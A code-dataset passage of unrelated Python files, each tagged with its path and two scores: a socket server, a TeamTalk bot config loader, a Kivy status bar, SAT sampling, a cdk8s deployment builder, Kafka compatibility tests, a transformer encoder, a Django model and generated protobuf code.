def handle_writeables(self,conn):
try:
msg = self.messages[conn].get_nowait()
except Queue.Empty:
self.outputs.remove(conn)
else:
conn.send(msg)
self.remove_connection(conn)
def handle_exceptionals(self,conn):
self.remove_connection(conn)
def __call__(self):
while self.inputs:
r,w,e = select.select(self.inputs,self.outputs,self.inputs)
for s in r:
self.handle_readables(s)
for s in w:
self.handle_writeables(s)
for s in e:
self.handle_exceptionals(s)
def add_route(self,route,function):
self.routes[route] = function
def answer(self,request):
route = request.Header.Route
if route not in self.routes:
return DefaultResponse.NotFound()
try:
return Response(request.Header,self.routes[route](request.Body))
except Exception:
return DefaultResponse.BadRequest()
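# Minimal demo: serve "/" on the default port (2145). The route handler receives
# the request body, and answer() above wraps its return value in a Response.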
A = Server()
A.add_route('/',lambda x: None)
A() | server.py | 0.234582 | 0.059156 |
import json
import sys
import portalocker
from bot import utils
default_config = {
"general": {
"language": "en",
"cache_file_name": "TTMediaBotCache.dat",
"blocked_commands": [],
"send_channel_messages": True,
"delete_uploaded_files_after": 300,
"time_format": r"%H:%M",
"load_event_handlers": False,
"event_handlers_file_name": "event_handlers.py",
},
"sound_devices": {
"output_device": 0,
"input_device": 0
},
"player": {
"default_volume": 50,
"max_volume": 100,
"volume_fading": True,
"volume_fading_interval": 0.025,
"seek_step": 5,
"player_options": {
"video": False,
},
},
"teamtalk": {
"hostname": "localhost",
"tcp_port": 10333,
"udp_port": 10333,
"encrypted": False,
"nickname": "TTMediaBot",
"status": "",
"gender": "n",
"username": "",
"password": "",
"channel": "/",
"channel_password": "",
"license_name": "",
"license_key": "",
"reconnection_attempts": -1,
"reconnection_timeout": 0,
"users": {
"admins": ["admin"],
"banned_users": []
}
},
"services": {
"available_services": {
"vk": {
"token": "",
},
"yt": {}
},
"default_service": "vk"
},
"logger": {
"log": True,
"level": "INFO",
"format": "%(levelname)s [%(asctime)s]: %(message)s in %(threadName)s file: %(filename)s line %(lineno)d function %(funcName)s",
"mode": 2,
"file_name": "TTMediaBot.log",
"max_file_size": 0,
"backup_count": 0
}
}
class Config(dict):
def __init__(self, file_name):
if file_name:
if utils.check_file_path(file_name):
self.file_name = file_name
with open(self.file_name, 'r', encoding='UTF-8') as f:
try:
config_dict = json.load(f)
except json.decoder.JSONDecodeError as e:
print("Syntax error in configuration file:", e)
sys.exit(1)
self.file_locker = portalocker.Lock(self.file_name, timeout=0, flags=portalocker.LOCK_EX|portalocker.LOCK_NB)
try:
self.file_locker.acquire()
except portalocker.exceptions.LockException:
raise PermissionError()
else:
print("Incorrect config file path")
sys.exit(1)
else:
# No config file given: fall back to defaults only. In this branch file_name
# and file_locker are never set, so close() and save() must not be called.
config_dict = {}
super().__init__(self.fill(config_dict, default_config))
def close(self):
self.file_locker.release()
def fill(self, data, template):
result = {}
for key in template:
if key in data and isinstance(template[key], dict):
result[key] = self.fill(data[key], template[key])
del data[key]
elif key in data:
result[key] = data[key]
del data[key]
else:
result[key] = template[key]
result.update(data)
return result
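# Illustrative behaviour of fill() (values assumed for the example): unknown
# user keys are preserved and known ones override the template recursively, so
# fill({'player': {'seek_step': 10}, 'extra': 1}, default_config) returns the
# full default tree with player.seek_step == 10 plus the top-level 'extra'.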
def save(self):
self.file_locker.release()
with open(self.file_name, 'w', encoding='UTF-8') as f:
json.dump(self, f, indent=4, ensure_ascii=False)
self.file_locker.acquire() | bot/config.py | 0.125159 | 0.23688 |
from kivy.factory import Factory
from kivy.properties import NumericProperty, BooleanProperty
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.label import Label
from cobiv.modules.core.component import Component
class StatusLabel(Component, Label):
def __init__(self, **kwargs):
super(StatusLabel, self).__init__(valign='middle', **kwargs)
self.bind(size=self.setter('text_size'))
self.session = self.get_session()
self.template_text = kwargs.get('text')
self.refresh()
def refresh(self):
if self.session is not None:
self.text = self.session.fill_text_fields(self.template_text)
else:
self.text = self.template_text
class StatusBar(Component, BoxLayout):
enabled = BooleanProperty(True)
def __init__(self, **kwargs):
height = kwargs.pop('height', 20)
super().__init__(size_hint=(1, None), height=height, **kwargs)
self.session = self.get_session()
if self.session is not None:
self.session.cursor.bind(file_id=self.on_file_id_change)
self.bind(enabled=self.set_enabled)
def set_enabled(self, instance, value):
if value:
self.bind_cursor()
else:
self.unbind_cursor()
def on_file_id_change(self, instance, value):
self.refresh_widgets()
def refresh_widgets(self):
for c in self.children:
refresh = getattr(c, 'refresh', None)
if refresh is not None:
c.refresh()
def add_label(self, text='', align='center', size=0, **kwargs):
if size == 0:
label = StatusLabel(text=text, halign=align)
else:
label = StatusLabel(text=text, halign=align, width=size, size_hint=(None, 1))
self.add_widget(label)
def init_items(self, config_items):
for cfg_item in config_items:
self.add_label(**cfg_item)
def bind_cursor(self):
pass
def unbind_cursor(self):
pass
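# Registering with the Kivy Factory exposes the widget by name, both to kv
# rules and to Python, e.g. (illustrative):
#
#     from kivy.factory import Factory
#     bar = Factory.SimpleStatusBar(height=24)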
Factory.register('SimpleStatusBar', cls=StatusBar) | cobiv/modules/hud_components/sidebar/statusbar.py | 0.61659 | 0.081374 |
import tempfile
import numpy as np
from numpy import count_nonzero
import os
def computeBias(Xvar,Yvar,sampling_cnf, sampling_weights_y_1, sampling_weights_y_0, inputfile_name, SkolemKnown, args):
samples_biased_one = generatesample( args, 500, sampling_cnf + sampling_weights_y_1, inputfile_name, 1)
samples_biased_zero = generatesample( args, 500, sampling_cnf + sampling_weights_y_0, inputfile_name, 1)
bias = ""
for yvar in Yvar:
if yvar in SkolemKnown:
continue
count_one = count_nonzero(samples_biased_one[:,yvar-1])
p = round(float(count_one)/500,2)
count_zero = count_nonzero(samples_biased_zero[:,yvar-1])
q = round(float(count_zero)/500,2)
if 0.35 < p < 0.65 and 0.35 < q < 0.65:
bias += "w %s %s\n" %(yvar,p)
elif q <= 0.35:
if float(q) == 0.0:
q = 0.001
bias += "w %s %s\n" %(yvar,q)
else:
if float(p) == 1.0:
p = 0.99
bias += "w %s %s\n" %(yvar,p)
return sampling_cnf + bias
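# Each emitted line has the form "w <var> <p>", e.g. "w 7 0.42" biases variable
# 7 towards True with probability ~0.42 (weight format assumed from the
# "--polar weight" sampling mode used in generatesample below).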
def generatesample(args, num_samples, sampling_cnf, inputfile_name, weighted):
tempcnffile = tempfile.gettempdir() + '/' + inputfile_name + "_sample.cnf"
with open(tempcnffile, "w") as f:
f.write(sampling_cnf)
tempoutputfile = tempfile.gettempdir() + '/' + inputfile_name + "_.txt"
if weighted:
cmd = "./dependencies/cryptominisat5 -n1 --sls 0 --comps 0"
cmd += " --restart luby --nobansol --maple 0 --presimp 0"
cmd += " --polar weight --freq 0.9999 --verb 0 --scc 0"
cmd += " --random %s --maxsol %s > /dev/null 2>&1" % (args.seed, int(num_samples))
cmd += " %s" % (tempcnffile)
cmd += " --dumpresult %s " % (tempoutputfile)
else:
cmd = "./dependencies/cryptominisat5 --restart luby"
cmd += " --maple 0 --verb 0 --nobansol"
cmd += " --scc 1 -n1 --presimp 0 --polar rnd --freq 0.9999"
cmd += " --random %s --maxsol %s" % (args.seed, int(num_samples))
cmd += " %s" % (tempcnffile)
cmd += " --dumpresult %s > /dev/null 2>&1" % (tempoutputfile)
os.system(cmd)
with open(tempoutputfile, "r") as f:
content = f.read()
os.unlink(tempoutputfile)
os.unlink(tempcnffile)
content = content.replace("SAT\n","").replace("\n"," ").strip(" \n").strip(" ")
models = content.split(" ")
models = np.array(models)
if models[len(models)-1] != "0":
models = np.delete(models, len(models) - 1, axis=0)
if len(np.where(models == "0")[0]) == 0:
# No "0" terminator found: the solver dumped no complete assignments.
return np.empty((0, 0), dtype=int)
index = np.where(models == "0")[0][0]
var_model = np.reshape(models, (-1, index + 1)).astype(int)
var_model = var_model > 0
var_model = np.delete(var_model, index, axis=1)
var_model = var_model.astype(int)
return var_model | src/generateSamples.py | 0.185099 | 0.281603 |
from __future__ import annotations
from imports import k8s
from cdk8s import Chart
from kubeasy_sdk.container import Container
from kubeasy_sdk.utils.collections.containers import Containers
from kubeasy_sdk.utils.resource import Rendered
from kubeasy_sdk.volume import Volume
from kubeasy_sdk.utils.collections.volumes import Volumes
from kubeasy_sdk.utils.security import SecurityContext
class Deployment(Rendered):
def __init__(self, name: str, namespace: str, environment: str, replicas: int = 1):
# Forward all constructor arguments (minus self) to the base Rendered class.
func_locals = dict(locals())
del func_locals['self']
super().__init__(**func_locals)
self.name = name
self.namespace = namespace
self.environment = environment
self.replicas = replicas
self.labels = {}
self.match_labels = {}
self.image_pull_policy = None
self.image_pull_secrets = []
self.pod_fs_gid = None
self.init_containers = Containers()
self.containers = Containers()
self.volumes = Volumes()
# Security Context
self.security_context = SecurityContext()
def set_replicas(self, replicas: int) -> Deployment:
self.replicas = replicas
return self
# Deployment Labels
def set_labels(self, labels: dict[str, str]) -> Deployment:
self.labels = labels
return self
def add_label(self, key: str, value: str) -> Deployment:
self.labels[key] = value
return self
# Deployment Match Labels
def set_match_labels(self, match_labels: dict[str, str]) -> Deployment:
self.match_labels = match_labels
return self
def add_match_label(self, key: str, value: str) -> Deployment:
self.match_labels[key] = value
return self
# === Security Settings ===
# Image Policies
def set_image_pull_policy(self, pull_policy: str) -> Deployment:
self.image_pull_policy = pull_policy
return self
def add_image_pull_secret(self, pull_secret: str) -> Deployment:
self.image_pull_secrets.append(k8s.LocalObjectReference(name=pull_secret))
return self
def set_pod_fs_gid(self, pod_fs_gid: int) -> Deployment:
self.pod_fs_gid = pod_fs_gid
return self
# Containers
def add_container(self, container: Container) -> Container:
self.containers.add_container(container)
return container
# Init Containers
def add_init_container(self, container: Container) -> Container:
self.init_containers.add_container(container)
return container
# Volume Mounts
def include_volume(self, volume: Volume) -> Volume:
self.volumes.add_volume(volume)
return volume
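# Illustrative fluent usage (names assumed; `chart` is a cdk8s Chart created
# elsewhere, and Container/Volume objects come from their own modules):
#
#     web = (Deployment('web', 'default', 'prod', replicas=3)
#            .add_label('app', 'web')
#            .add_match_label('app', 'web')
#            .set_image_pull_policy('IfNotPresent'))
#     web.render_k8s_resource(chart)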
def render_k8s_resource(self, chart: Chart) -> Deployment:
# Create the metadata and label selectors for the deployment
object_meta = k8s.ObjectMeta(labels=self.labels)
label_selector = k8s.LabelSelector(match_labels=self.match_labels)
# Generate the podspec templates for the deployment
podspec = k8s.PodSpec(init_containers=self.init_containers.render(chart),
image_pull_secrets=self.image_pull_secrets,
containers=self.containers.render(chart),
volumes=self.volumes.render(chart))
podspec_template = k8s.PodTemplateSpec(metadata=object_meta,
spec=podspec)
# Use the podspec to build the deployment spec, register the k8s.Deployment on the chart, and return self for chaining.
deployment_spec = k8s.DeploymentSpec(replicas=self.replicas, selector=label_selector, template=podspec_template)
k8s.Deployment(chart, 'deployment', metadata=k8s.ObjectMeta(name=self.name), spec=deployment_spec)
return self | kubeasy_sdk/deployment.py | 0.773388 | 0.257993 |
from ducktape.tests.test import Test
from kafkatest.services.zookeeper import ZookeeperService
from kafkatest.services.kafka import KafkaService
from kafkatest.services.kafka.version import LATEST_0_8_2, TRUNK
from kafkatest.services.verifiable_producer import VerifiableProducer
from kafkatest.services.console_consumer import ConsoleConsumer, is_int
class ClientCompatibilityTest(Test):
def __init__(self, test_context):
super(ClientCompatibilityTest, self).__init__(test_context=test_context)
def setUp(self):
self.topic = "test_topic"
self.zk = ZookeeperService(self.test_context, num_nodes=1)
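# Fixed 0.8.2 broker cluster with a 3x-replicated topic; clients at different versions are run against it below.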
self.kafka = KafkaService(self.test_context, num_nodes=3, zk=self.zk, version=LATEST_0_8_2, topics={self.topic: {
"partitions": 3,
"replication-factor": 3,
"min.insync.replicas": 2}})
self.zk.start()
self.kafka.start()
# Producer and consumer
self.producer_throughput = 10000
self.num_producers = 1
self.num_consumers = 1
def test_producer_back_compatibility(self):
"""Run 0.9.X java producer against 0.8.X brokers.
This test documents the fact that java producer v0.9.0.0 and later won't run against 0.8.X brokers
the broker responds to a V1 produce request with a V0 fetch response; the client then tries to parse this V0
produce response as a V1 produce response, resulting in a BufferUnderflowException
"""
self.producer = VerifiableProducer(
self.test_context, self.num_producers, self.kafka, self.topic, max_messages=100,
throughput=self.producer_throughput, version=TRUNK)
node = self.producer.nodes[0]
try:
self.producer.start()
self.producer.wait()
except Exception:
# Expected: the 0.9.X producer cannot complete against the 0.8.X broker
pass
else:
# The producer ran cleanly, which should be impossible against 0.8.X brokers
raise Exception("0.9.X java producer should not run successfully against 0.8.X broker")
finally:
self.producer.kill_node(node, clean_shutdown=False)
self.logger.info("Grepping producer log for expected error type")
node.account.ssh("egrep -m 1 %s %s" % ("\"org\.apache\.kafka\.common\.protocol\.types\.SchemaException.*throttle_time_ms.*: java\.nio\.BufferUnderflowException\"", self.producer.LOG_FILE), allow_fail=False)
def test_consumer_back_compatibility(self):
"""Run 0.9.X and 0.8.X console consumers against an 0.8.X cluster.
Expect the 0.9.X consumer to fail with buffer underflow while the 0.8.X consumer succeeds. This error is the
same as when an 0.9.X producer is run against an 0.8.X broker: the broker responds to a V1 fetch request with
a V0 fetch response; the client then tries to parse this V0 fetch response as a V1 fetch response, resulting
in a BufferUnderflowException
"""
num_messages = 10
self.producer = VerifiableProducer(
self.test_context, self.num_producers, self.kafka, self.topic, max_messages=num_messages,
throughput=self.producer_throughput, version=LATEST_0_8_2)
self.consumer = ConsoleConsumer(
self.test_context, self.num_consumers, self.kafka, self.topic, group_id="consumer-09X",
consumer_timeout_ms=10000, message_validator=is_int, version=TRUNK)
self.old_consumer = ConsoleConsumer(
self.test_context, self.num_consumers, self.kafka, self.topic, group_id="consumer-08X",
consumer_timeout_ms=10000, message_validator=is_int, version=LATEST_0_8_2)
self.producer.run()
self.consumer.run()
self.old_consumer.run()
consumed = len(self.consumer.messages_consumed[1])
old_consumed = len(self.old_consumer.messages_consumed[1])
assert old_consumed == num_messages, "Expected 0.8.X scala consumer to consume %d, but only got %d" % (num_messages, old_consumed)
assert consumed == 0, "Expected 0.9.X consumer to fail to consume any messages, but got %d" % consumed
self.logger.info("Grepping consumer log for expected error type")
node = self.consumer.nodes[0]
node.account.ssh("egrep -m 1 %s %s" % ("\"java\.nio\.BufferUnderflowException\"", self.consumer.LOG_FILE), allow_fail=False) | tests/kafkatest/tests/compatibility_test.py | 0.677367 | 0.23268 |
import torch
from torch import nn
from .attention import CustomMultiHeadAttention
from .blocks import PositionwiseFeedForward, CustomLayerNorm
from .position_layers import PositionEncoding
class CustomEncoderLayer(nn.Module):
def __init__(self, dim, n_head, ffn_hidden=None, dropout=0.0):
"""
Encoder block
:param dim: Embedding dimension
:param n_head: Number of heads in multi-head attention
:param ffn_hidden: Number of hidden units in the position-wise feed-forward layer
:param dropout: Dropout rate in the block
"""
super(CustomEncoderLayer, self).__init__()
self.multiheadatt = CustomMultiHeadAttention(dim, n_head)
self.norm1 = CustomLayerNorm(dim)
self.dropout1 = nn.Dropout(p=dropout)
self.ffn = PositionwiseFeedForward(dim, ffn_hidden, dropout=dropout)
self.norm2 = CustomLayerNorm(dim)
self.dropout2 = nn.Dropout(p=dropout)
def forward(self, x, mask=None):
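# Post-norm residual wiring: each sublayer's output is added to its input, layer-normalized, then passed through dropout.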
# Compute attention
_x = x
x = self.multiheadatt(x, x, x, mask=mask)
# add norm
x = self.norm1(x + _x)
x = self.dropout1(x)
# feed forward
_x = x
x = self.ffn(x)
# add norm
x = self.norm2(x + _x)
x = self.dropout2(x)
return x
class CustomEncoder(nn.Module):
def __init__(self, vocab_size, max_len, dim, ffn_hidden, n_head, n_layers, dropout=0.1):
"""
Encoder (n x encode layer)
:param vocab_size: Input vocab size for embedding
:param max_len: Maximum length of position embedding
:param dim: Embedding dimension
:param ffn_hidden: Number of hidden units in the position-wise feed-forward layer
:param n_head: Number of heads in multi-head attention
:param n_layers: Number of repeated encoder layers
:param dropout: Dropout rate of encoder
"""
super(CustomEncoder, self).__init__()
self.embed = nn.Embedding(vocab_size, dim, padding_idx=1)
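# padding_idx=1 assumes token id 1 is the pad token; its embedding is fixed at zero and receives no gradient updates.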
self.position = PositionEncoding(dim, dropout=dropout, max_len=max_len)
self.layers = nn.ModuleList([CustomEncoderLayer(dim,
n_head,
ffn_hidden,
dropout)
for _ in range(n_layers)])
def forward(self, x, mask=None):
x = self.embed(x)
x = self.position(x)
for layer in self.layers:
x = layer(x, mask)
return x | modules/encoder.py | 0.957308 | 0.340293 |
import logging
from django.db import models
from jsonfield import JSONField
from ...bases.metadata.models import BaseListingItemRelation
logger = logging.getLogger(__name__)
class EmbeddedInfo(models.Model):
path = models.CharField(max_length=500)
query_key = models.CharField(max_length=50)
index = models.IntegerField(null=True)
title = models.CharField(max_length=300, null=True)
cover = models.URLField(null=True, max_length=1000)
year = models.IntegerField(null=True)
plot = models.TextField(null=True)
duration = models.IntegerField(null=True)
rating = models.DecimalField(null=True, decimal_places=2, max_digits=3)
genres = JSONField(default=list) # callable default prevents sharing one mutable list across instances
primary_language = models.CharField(max_length=50, null=True)
file_source = models.CharField(null=True, max_length=100)
group = models.CharField(max_length=300, null=True)
mediainfo_resolution = models.CharField(null=True, max_length=100)
mediainfo_codec = models.CharField(null=True, max_length=100)
mediainfo_container = models.CharField(null=True, max_length=100)
mediainfo_source = models.CharField(null=True, max_length=100)
mediainfo_scene = models.BooleanField(default=False)
mediainfo_dual_audio = models.BooleanField(default=False)
mediainfo_audio = models.CharField(null=True, max_length=100)
mediainfo_best = models.BooleanField(
default=False
) # probably the best choice if you have to choose
bittorrent_seeders = models.IntegerField(null=True)
bittorrent_leechers = models.IntegerField(null=True)
bittorrent_snatched = models.IntegerField(null=True)
episodeinfo_episode_type = models.CharField(max_length=200, blank=True, null=True)
episodeinfo_season = models.IntegerField(blank=True, null=True)
episodeinfo_episode = models.IntegerField(blank=True, null=True)
episodeinfo_year = models.IntegerField(blank=True, null=True)
episodeinfo_month = models.IntegerField(blank=True, null=True)
episodeinfo_day = models.IntegerField(blank=True, null=True)
episodeinfo_sub_title = models.CharField(max_length=150, blank=True, null=True)
datetime = models.DateTimeField(auto_now=True)
class Meta:
unique_together = (("query_key", "path"),)
@property
def metadata_name(self):
return "embedded"
@property
def identifier(self):
return self.pk
def set_available(self):
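# Note: bittorrent_available is not declared as a field on this model, so this sets a plain Python
# attribute; save() will not persist it unless the field is defined elsewhere (e.g. on a subclass).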
if self.file_source == "bittorrent":
self.bittorrent_available = True
self.save()
class ListingItemRelation(BaseListingItemRelation):
metadata = models.ForeignKey(EmbeddedInfo, on_delete=models.CASCADE) | tridentstream/metadata/embedded/models.py | 0.494629 | 0.20458 |
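# The following module is protoc-generated from effects.proto (note the @@protoc_insertion_point markers); hand edits would be overwritten on regeneration.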
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='effects.proto',
package='effects',
syntax='proto3',
serialized_pb=_b('\n\reffects.proto\x12\x07\x65\x66\x66\x65\x63ts\"!\n\x10\x44\x65ltaModificator\x12\r\n\x05\x64\x65lta\x18\x01 \x01(\t\"e\n\x06\x45\x66\x66\x65\x63t\x12\n\n\x02id\x18\x01 \x01(\x03\x12\x11\n\tattribute\x18\x02 \x01(\x03\x12\x0e\n\x06\x65ntity\x18\x03 \x01(\x03\x12\r\n\x05value\x18\x04 \x01(\t\x12\x0f\n\x07\x63\x61ption\x18\x05 \x01(\t\x12\x0c\n\x04\x64\x61ta\x18\x06 \x01(\t\"2\n\x0fRegisterRequest\x12\x1f\n\x06\x65\x66\x66\x65\x63t\x18\x01 \x01(\x0b\x32\x0f.effects.Effect\"%\n\x10RegisterResponse\x12\x11\n\teffect_id\x18\x01 \x01(\x03\"\"\n\rRemoveRequest\x12\x11\n\teffect_id\x18\x01 \x01(\x03\"\x10\n\x0eRemoveResponse\"0\n\rUpdateRequest\x12\x1f\n\x06\x65\x66\x66\x65\x63t\x18\x01 \x01(\x0b\x32\x0f.effects.Effect\"\x10\n\x0eUpdateResponse\"\r\n\x0bListRequest\"0\n\x0cListResponse\x12 \n\x07\x65\x66\x66\x65\x63ts\x18\x01 \x03(\x0b\x32\x0f.effects.Effect\"\x1a\n\x18\x44\x65\x62ugClearServiceRequest\"\x1b\n\x19\x44\x65\x62ugClearServiceResponseb\x06proto3')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_DELTAMODIFICATOR = _descriptor.Descriptor(
name='DeltaModificator',
full_name='effects.DeltaModificator',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='delta', full_name='effects.DeltaModificator.delta', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=26,
serialized_end=59,
)
_EFFECT = _descriptor.Descriptor(
name='Effect',
full_name='effects.Effect',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='effects.Effect.id', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='attribute', full_name='effects.Effect.attribute', index=1,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='entity', full_name='effects.Effect.entity', index=2,
number=3, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='effects.Effect.value', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='caption', full_name='effects.Effect.caption', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='data', full_name='effects.Effect.data', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=61,
serialized_end=162,
)
_REGISTERREQUEST = _descriptor.Descriptor(
name='RegisterRequest',
full_name='effects.RegisterRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='effect', full_name='effects.RegisterRequest.effect', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=164,
serialized_end=214,
)
_REGISTERRESPONSE = _descriptor.Descriptor(
name='RegisterResponse',
full_name='effects.RegisterResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='effect_id', full_name='effects.RegisterResponse.effect_id', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=216,
serialized_end=253,
)
_REMOVEREQUEST = _descriptor.Descriptor(
name='RemoveRequest',
full_name='effects.RemoveRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='effect_id', full_name='effects.RemoveRequest.effect_id', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=255,
serialized_end=289,
)
_REMOVERESPONSE = _descriptor.Descriptor(
name='RemoveResponse',
full_name='effects.RemoveResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=291,
serialized_end=307,
)
_UPDATEREQUEST = _descriptor.Descriptor(
name='UpdateRequest',
full_name='effects.UpdateRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='effect', full_name='effects.UpdateRequest.effect', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=309,
serialized_end=357,
)
_UPDATERESPONSE = _descriptor.Descriptor(
name='UpdateResponse',
full_name='effects.UpdateResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=359,
serialized_end=375,
)
_LISTREQUEST = _descriptor.Descriptor(
name='ListRequest',
full_name='effects.ListRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=377,
serialized_end=390,
)
_LISTRESPONSE = _descriptor.Descriptor(
name='ListResponse',
full_name='effects.ListResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='effects', full_name='effects.ListResponse.effects', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=392,
serialized_end=440,
)
_DEBUGCLEARSERVICEREQUEST = _descriptor.Descriptor(
name='DebugClearServiceRequest',
full_name='effects.DebugClearServiceRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=442,
serialized_end=468,
)
_DEBUGCLEARSERVICERESPONSE = _descriptor.Descriptor(
name='DebugClearServiceResponse',
full_name='effects.DebugClearServiceResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=470,
serialized_end=497,
)
_REGISTERREQUEST.fields_by_name['effect'].message_type = _EFFECT
_UPDATEREQUEST.fields_by_name['effect'].message_type = _EFFECT
_LISTRESPONSE.fields_by_name['effects'].message_type = _EFFECT
DESCRIPTOR.message_types_by_name['DeltaModificator'] = _DELTAMODIFICATOR
DESCRIPTOR.message_types_by_name['Effect'] = _EFFECT
DESCRIPTOR.message_types_by_name['RegisterRequest'] = _REGISTERREQUEST
DESCRIPTOR.message_types_by_name['RegisterResponse'] = _REGISTERRESPONSE
DESCRIPTOR.message_types_by_name['RemoveRequest'] = _REMOVEREQUEST
DESCRIPTOR.message_types_by_name['RemoveResponse'] = _REMOVERESPONSE
DESCRIPTOR.message_types_by_name['UpdateRequest'] = _UPDATEREQUEST
DESCRIPTOR.message_types_by_name['UpdateResponse'] = _UPDATERESPONSE
DESCRIPTOR.message_types_by_name['ListRequest'] = _LISTREQUEST
DESCRIPTOR.message_types_by_name['ListResponse'] = _LISTRESPONSE
DESCRIPTOR.message_types_by_name['DebugClearServiceRequest'] = _DEBUGCLEARSERVICEREQUEST
DESCRIPTOR.message_types_by_name['DebugClearServiceResponse'] = _DEBUGCLEARSERVICERESPONSE
DeltaModificator = _reflection.GeneratedProtocolMessageType('DeltaModificator', (_message.Message,), dict(
DESCRIPTOR = _DELTAMODIFICATOR,
__module__ = 'effects_pb2'
# @@protoc_insertion_point(class_scope:effects.DeltaModificator)
))
_sym_db.RegisterMessage(DeltaModificator)
Effect = _reflection.GeneratedProtocolMessageType('Effect', (_message.Message,), dict(
DESCRIPTOR = _EFFECT,
__module__ = 'effects_pb2'
# @@protoc_insertion_point(class_scope:effects.Effect)
))
_sym_db.RegisterMessage(Effect)
RegisterRequest = _reflection.GeneratedProtocolMessageType('RegisterRequest', (_message.Message,), dict(
DESCRIPTOR = _REGISTERREQUEST,
__module__ = 'effects_pb2'
# @@protoc_insertion_point(class_scope:effects.RegisterRequest)
))
_sym_db.RegisterMessage(RegisterRequest)
RegisterResponse = _reflection.GeneratedProtocolMessageType('RegisterResponse', (_message.Message,), dict(
DESCRIPTOR = _REGISTERRESPONSE,
__module__ = 'effects_pb2'
